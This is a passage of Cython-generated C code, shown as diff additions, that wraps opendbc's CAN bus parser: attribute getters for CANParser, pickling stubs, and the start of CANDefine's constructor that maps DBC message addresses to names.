dict ts_nanos + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_2vl_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_2vl_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_2vl___get__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_2vl___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->vl); + __pyx_r = __pyx_v_self->vl; + goto __pyx_L0; + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":27 + * cdef readonly: + * dict vl + * dict vl_all # <<<<<<<<<<<<<< + * dict ts_nanos + * string dbc_name + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_6vl_all_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_6vl_all_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_6vl_all___get__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_6vl_all___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->vl_all); + __pyx_r = __pyx_v_self->vl_all; + goto __pyx_L0; + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":28 + * dict vl + * dict vl_all + * dict ts_nanos # <<<<<<<<<<<<<< + * string dbc_name + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_8ts_nanos_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_8ts_nanos_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8ts_nanos___get__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8ts_nanos___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->ts_nanos); + __pyx_r = __pyx_v_self->ts_nanos; + goto __pyx_L0; + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":29 + * dict vl_all + * dict ts_nanos + * string dbc_name # <<<<<<<<<<<<<< + * + * def __init__(self, dbc_name, signals, checks=None, bus=0, enforce_checks=True): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_8dbc_name_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_8dbc_name_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8dbc_name___get__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8dbc_name___get__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_v_self->dbc_name); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 29, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.dbc_name.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_5__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7opendbc_3can_10parser_pyx_9CANParser_5__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_5__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_5__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_4__reduce_cython__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_4__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_can_self_dbc_cannot_be_conv, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_7__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7opendbc_3can_10parser_pyx_9CANParser_7__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_7__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7opendbc_3can_10parser_pyx_9CANParser_7__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_6__setstate_cython__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_6__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_7opendbc_3can_10parser_pyx_CANParser *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_self_can_self_dbc_cannot_be_conv, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.can,self.dbc cannot be converted to a Python object for pickling" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANParser.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "opendbc/can/parser_pyx.pyx":151 + * string dbc_name + * + * def __init__(self, dbc_name): # <<<<<<<<<<<<<< + * self.dbc_name = dbc_name + * self.dbc = dbc_lookup(dbc_name) + */ + +/* Python wrapper */ +static int __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_7opendbc_3can_10parser_pyx_9CANDefine_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_dbc_name = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_dbc_name,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_dbc_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 151, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(0, 151, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + } + __pyx_v_dbc_name = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 151, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("opendbc.can.parser_pyx.CANDefine.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine___init__(((struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *)__pyx_v_self), __pyx_v_dbc_name); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_7opendbc_3can_10parser_pyx_9CANDefine___init__(struct __pyx_obj_7opendbc_3can_10parser_pyx_CANDefine *__pyx_v_self, PyObject *__pyx_v_dbc_name) { + PyObject *__pyx_v_address_to_msg_name = NULL; + std::vector ::size_type __pyx_v_i; + struct Msg __pyx_v_msg; + PyObject *__pyx_v_name = NULL; + uint32_t __pyx_v_address; + PyObject *__pyx_v_dv = NULL; + struct Val __pyx_v_val; + PyObject *__pyx_v_sgname = NULL; + PyObject *__pyx_v_def_val = NULL; + PyObject *__pyx_v_msgname = NULL; + PyObject *__pyx_v_values = NULL; + PyObject *__pyx_v_defs = NULL; + PyObject *__pyx_8genexpr4__pyx_v_v = NULL; + int __pyx_r; + __Pyx_RefNannyDeclarations + std::string __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + Py_ssize_t __pyx_t_4; + Py_UCS4 __pyx_t_5; + PyObject *__pyx_t_6 = NULL; + std::vector ::size_type __pyx_t_7; + std::vector ::size_type __pyx_t_8; + std::vector ::size_type __pyx_t_9; + uint32_t __pyx_t_10; + PyObject *__pyx_t_11 = NULL; + int __pyx_t_12; + std::vector ::size_type __pyx_t_13; + std::vector ::size_type __pyx_t_14; + PyObject *(*__pyx_t_15)(PyObject *); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__init__", 0); + + /* "opendbc/can/parser_pyx.pyx":152 + * + * def __init__(self, dbc_name): + * self.dbc_name = dbc_name # <<<<<<<<<<<<<< + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: + */ + __pyx_t_1 = __pyx_convert_string_from_py_std__in_string(__pyx_v_dbc_name); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 152, __pyx_L1_error) + __pyx_v_self->dbc_name = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_1); + + /* "opendbc/can/parser_pyx.pyx":153 + * def __init__(self, dbc_name): + * self.dbc_name = dbc_name + * self.dbc = dbc_lookup(dbc_name) # <<<<<<<<<<<<<< + * if not self.dbc: + * raise RuntimeError(f"Can't find DBC: '{dbc_name}'") + */ + __pyx_t_1 = __pyx_convert_string_from_py_std__in_string(__pyx_v_dbc_name); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 153, __pyx_L1_error) + __pyx_v_self->dbc = dbc_lookup(__PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_1)); + + /* "opendbc/can/parser_pyx.pyx":154 + * self.dbc_name = dbc_name + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: # <<<<<<<<<<<<<< + * raise RuntimeError(f"Can't find DBC: '{dbc_name}'") + * + */ + __pyx_t_2 = (!(__pyx_v_self->dbc != 0)); + if (unlikely(__pyx_t_2)) { + + /* "opendbc/can/parser_pyx.pyx":155 + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: + * raise RuntimeError(f"Can't find DBC: '{dbc_name}'") # <<<<<<<<<<<<<< + * + * address_to_msg_name = {} + */ + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 155, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = 0; + __pyx_t_5 = 127; + __Pyx_INCREF(__pyx_kp_u_Can_t_find_DBC_2); + __pyx_t_4 += 17; + __Pyx_GIVEREF(__pyx_kp_u_Can_t_find_DBC_2); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_kp_u_Can_t_find_DBC_2); + __pyx_t_6 = __Pyx_PyObject_FormatSimple(__pyx_v_dbc_name, __pyx_empty_unicode); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 155, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_5 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_6) > __pyx_t_5) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_6) : __pyx_t_5; + __pyx_t_4 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_6); + __pyx_t_6 = 0; + __Pyx_INCREF(__pyx_kp_u__4); + __pyx_t_4 += 1; + __Pyx_GIVEREF(__pyx_kp_u__4); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_kp_u__4); + __pyx_t_6 = __Pyx_PyUnicode_Join(__pyx_t_3, 3, __pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 155, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyObject_CallOneArg(__pyx_builtin_RuntimeError, __pyx_t_6); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 155, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_Raise(__pyx_t_3, 0, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(0, 155, __pyx_L1_error) + + /* "opendbc/can/parser_pyx.pyx":154 + * self.dbc_name = dbc_name + * self.dbc = dbc_lookup(dbc_name) + * if not self.dbc: # <<<<<<<<<<<<<< + * raise RuntimeError(f"Can't find DBC: '{dbc_name}'") + * + */ + } + + /* "opendbc/can/parser_pyx.pyx":157 + * raise RuntimeError(f"Can't find DBC: '{dbc_name}'") + * + * address_to_msg_name = {} # <<<<<<<<<<<<<< + * + * for i in range(self.dbc[0].msgs.size()): + */ + __pyx_t_3 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 157, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_v_address_to_msg_name = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + + /* "opendbc/can/parser_pyx.pyx":159 + * address_to_msg_name = {} + * + * for i in range(self.dbc[0].msgs.size()): # <<<<<<<<<<<<<< + * msg = self.dbc[0].msgs[i] + * name = msg.name.decode("utf8") + */ + __pyx_t_7 = (__pyx_v_self->dbc[0]).msgs.size(); + __pyx_t_8 = __pyx_t_7; + for (__pyx_t_9 = 0; __pyx_t_9 < __pyx_t_8; __pyx_t_9+=1) { + __pyx_v_i = __pyx_t_9; + + /* "opendbc/can/parser_pyx.pyx":160 + * + * for i in range(self.dbc[0].msgs.size()): + * msg = self.dbc[0].msgs[i] # <<<<<<<<<<<<<< + * name = msg.name.decode("utf8") + * address = msg.address + */ + __pyx_v_msg = ((__pyx_v_self->dbc[0]).msgs[__pyx_v_i]); + + /* "opendbc/can/parser_pyx.pyx":161 + * for i in range(self.dbc[0].msgs.size()): + * msg = self.dbc[0].msgs[i] + * name = msg.name.decode("utf8") # <<<<<<<<<<<<<< + * address = msg.address + * address_to_msg_name[address] = name + */ + __pyx_t_3 = __Pyx_decode_cpp_string(__pyx_v_msg.name, 0, PY_SSIZE_T_MAX, NULL, NULL, PyUnicode_DecodeUTF8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 161, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_XDECREF_SET(__pyx_v_name, __pyx_t_3); + __pyx_t_3 = 0; + + /* "opendbc/can/parser_pyx.pyx":162 + * msg = self.dbc[0].msgs[i] + * name = msg.name.decode("utf8") + * address = msg.address # <<<<<<<<<<<<<< + * address_to_msg_name[address] = name + * + */ + __pyx_t_10 = __pyx_v_msg.address; + __pyx_v_address = __pyx_t_10; + + /* "opendbc/can/parser_pyx.pyx":163 + * name = msg.name.decode("utf8") + * address = msg.address + * address_to_msg_name[address] = name # <<<<<<<<<<<<<< + * + * dv = defaultdict(dict) + */ + __pyx_t_3 = __Pyx_PyInt_From_uint32_t(__pyx_v_address); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 163, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (unlikely((PyDict_SetItem(__pyx_v_address_to_msg_name, __pyx_t_3, __pyx_v_name) < 0))) __PYX_ERR(0, 163, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + + /* "opendbc/can/parser_pyx.pyx":165 + * address_to_msg_name[address] = name + * + * dv = defaultdict(dict) # <<<<<<<<<<<<<< + * + * for i in range(self.dbc[0].vals.size()): + */ + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_defaultdict); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 165, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_11 = NULL; + __pyx_t_12 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_11)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_11); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_12 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_11, ((PyObject *)(&PyDict_Type))}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_12, 1+__pyx_t_12); + __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 165, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + __pyx_v_dv = __pyx_t_3; + __pyx_t_3 = 0; + + /* "opendbc/can/parser_pyx.pyx":167 + * dv = defaultdict(dict) + * + * for i in range(self.dbc[0].vals.size()): # <<<<<<<<<<<<<< + * val = self.dbc[0].vals[i] + * + */ + __pyx_t_9 = (__pyx_v_self->dbc[0]).vals.size(); + __pyx_t_13 = __pyx_t_9; + for (__pyx_t_14 = 0; __pyx_t_14 < __pyx_t_13; __pyx_t_14+=1) { + __pyx_v_i = __pyx_t_14; + + /* "opendbc/can/parser_pyx.pyx":168 + * + * for i in range(self.dbc[0].vals.size()): + * val = self.dbc[0].vals[i] # <<<<<<<<<<<<<< + * + * sgname = val.name.decode("utf8") + */ + __pyx_v_val = ((__pyx_v_self->dbc[0]).vals[__pyx_v_i]); + + /* "opendbc/can/parser_pyx.pyx":170 + * val = self.dbc[0].vals[i] + * + * sgname = val.name.decode("utf8") # <<<<<<<<<<<<<< + * def_val = val.def_val.decode("utf8") + * address = val.address + */ + __pyx_t_3 = __Pyx_decode_cpp_string(__pyx_v_val.name, 0, PY_SSIZE_T_MAX, NULL, NULL, PyUnicode_DecodeUTF8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 170, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_XDECREF_SET(__pyx_v_sgname, __pyx_t_3); + __pyx_t_3 = 0; + + /* "opendbc/can/parser_pyx.pyx":171 + * + * sgname = 